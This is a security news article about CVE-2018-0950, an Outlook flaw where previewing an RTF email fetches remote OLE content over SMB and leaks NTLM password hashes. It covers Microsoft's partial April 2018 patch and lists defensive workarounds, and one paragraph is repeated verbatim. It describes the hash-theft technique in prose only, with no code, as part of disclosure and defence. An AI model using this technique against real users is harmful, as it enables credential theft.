April 2018 Patch Tuesday has been rolled out. It contains 66 security fixes for vulnerabilities. One of the more intriguing patches involves an older Microsoft Outlook flaw that was first reported in 2016.
However, according to Will Dormann, the vulnerability analyst at CERT who disclosed it, the just-released patch is not complete and it needs further workarounds. The bug in question is CVE-2018-0950.
What Is CVE-2018-0950?
Microsoft Outlook will automatically retrieve remote OLE content when an RTF email is previewed. When remote OLE content is hosted on a SMB/CIFS server, the Windows client system will attempt to authenticate with the server using single sign-on (SSO). This may leak the user’s IP address, domain name, user name, host name, and password hash. If the user’s password is not complex enough, then an attacker may be able to crack the password in a short amount of time.
Microsoft Outlook will automatically retrieve remote OLE content when an RTF email is previewed. When remote OLE content is hosted on a SMB/CIFS server, the Windows client system will attempt to authenticate with the server using single sign-on (SSO). This may leak the user’s IP address, domain name, user name, host name, and password hash. If the user’s password is not complex enough, then an attacker may be able to crack the password in a short amount of time.
The researcher believes that the biggest issue with this bug is that Outlook automatically renders the content of remote OLE objects (Object Linking and Embedding) embedded inside rich formatted emails without first prompting the user. This activity is associated with other Microsoft Office products like Word, PowerPoint and Excel, and has become a common attack vector for malicious actors.
The vulnerability analyst assessed that the bug could be exploited to steal user account passwords, or more specifically NTLM hashes. He carried out the successful exploit by sending an email to an Outlook account that had an OLE object embedded, making requests to a remote SMB server of malicious nature. By default the targeted Windows computer would try to authenticate on this remote and malevolent SMB server by sharing the user’s NTLM hash, the researcher discovered.
It is quite easy for an attacker to take an advantage of this attack vector – by simply collecting the hashes, then cracking them offline, and leveraging them to infiltrate the victim’s system. Other components of the internal network could also be affected.
What Is the Issue with Microsoft’s Patch?
Apparently, the company addressed the vulnerability only partially by patching the SMB attack vector. The researcher informed Microsoft about the OLE-associated issue stemming from CVE-2018-0950 in November 2016. 18 months later, Microsoft has finally issued a patch in April 2018 Patch Tuesday, but as it turns out, the patch only fixes the issue half-way. The core of the problem remains unsolved.
Nonetheless, the patch for this vulnerability is still crucial and should be applied immediately.
As for the workarounds:
1. Block inbound and outbound SMB connections at your network border;
2. Block NTLM Single Sign-on (SSO) authentication;
3. Use complex passwords.
More details are available in the advisory published on CERT’s vulnerability notes database.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me: